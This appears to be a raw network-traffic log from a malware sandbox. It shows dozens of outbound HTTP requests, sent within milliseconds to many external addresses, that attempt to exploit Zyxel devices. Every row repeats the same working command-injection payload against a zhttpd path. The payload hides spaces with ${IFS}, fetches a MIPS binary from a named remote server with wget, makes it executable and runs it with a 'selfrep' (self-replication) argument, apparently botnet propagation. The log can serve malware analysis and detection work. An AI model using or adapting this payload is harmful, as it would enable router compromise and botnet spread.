                                                        Feb 2, 2024 06:21:23.202209949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7650192.168.2.1445142164.159.157.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202222109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7651192.168.2.144209090.69.10.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202269077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7652192.168.2.144792652.76.9.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202311039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7653192.168.2.1433314204.99.146.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202342033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7654192.168.2.1450334105.72.241.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202390909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7655192.168.2.1434410120.154.240.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202418089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7656192.168.2.1438970145.144.3.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202478886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7657192.168.2.1448728178.174.2.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202507973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7658192.168.2.1454574111.222.7.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202547073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7659192.168.2.1434138124.30.68.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202590942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7660192.168.2.1447010138.98.239.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202634096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7661192.168.2.1452648101.25.112.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202662945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7662192.168.2.1442212120.179.231.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202763081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7663192.168.2.1442534122.142.255.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202806950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7664192.168.2.1459556137.120.30.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202856064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7665192.168.2.1444286146.106.171.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202882051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7666192.168.2.144586080.5.35.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202910900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7667192.168.2.1442680103.139.150.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.202975035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7668192.168.2.145040839.14.164.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203008890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7669192.168.2.1446482143.163.202.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203013897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7670192.168.2.1445288181.197.211.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203056097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7671192.168.2.145170050.39.49.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203099966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7672192.168.2.144551214.193.165.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203150034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7673192.168.2.14455824.207.238.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203171968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7674192.168.2.1448754155.224.123.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203217030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7675192.168.2.143822277.185.85.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203253031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7676192.168.2.145566096.166.171.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203274012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7677192.168.2.143935887.172.202.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203308105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7678192.168.2.144645848.23.153.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203360081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7679192.168.2.145728091.9.211.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203397036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7680192.168.2.143893225.144.197.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203432083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7681192.168.2.1454638168.145.243.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203459978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7682192.168.2.145102046.140.92.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203494072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7683192.168.2.1434962113.174.154.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203526020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7684192.168.2.145553086.160.45.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203583002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7685192.168.2.1451592195.145.79.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203619957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7686192.168.2.1434970219.169.143.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203655005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7687192.168.2.143401284.28.143.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203661919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7688192.168.2.1439378103.212.198.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203705072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7689192.168.2.1447286181.177.194.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203733921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7690192.168.2.1452984144.218.82.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203799963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7691192.168.2.1445618163.236.138.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203826904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7692192.168.2.1443294110.128.158.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203866959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7693192.168.2.1450328154.164.172.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203917027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7694192.168.2.1439834186.173.94.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203939915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7695192.168.2.14409785.13.149.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.203979015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7696192.168.2.1435596189.144.209.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204015970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7697192.168.2.1445532213.44.49.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204051018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7698192.168.2.146052824.241.188.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204088926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7699192.168.2.145106013.106.90.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204138041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7700192.168.2.1446424208.227.131.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204166889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7701192.168.2.144215052.84.52.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204236031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7702192.168.2.145405670.13.184.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204257965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7703192.168.2.1445114152.131.173.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204330921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7704192.168.2.1444636117.104.67.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204381943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7705192.168.2.1445190217.189.246.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204418898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7706192.168.2.1447664118.35.190.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204451084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7707192.168.2.145829231.85.234.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204489946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7708192.168.2.1449932171.119.48.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204515934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7709192.168.2.1441672177.139.100.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204566002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7710192.168.2.1443622187.117.28.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204624891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7711192.168.2.1451780111.58.189.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204649925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7712192.168.2.1440208151.239.14.88443
                                                        TimestampBytes transferredDirectionData
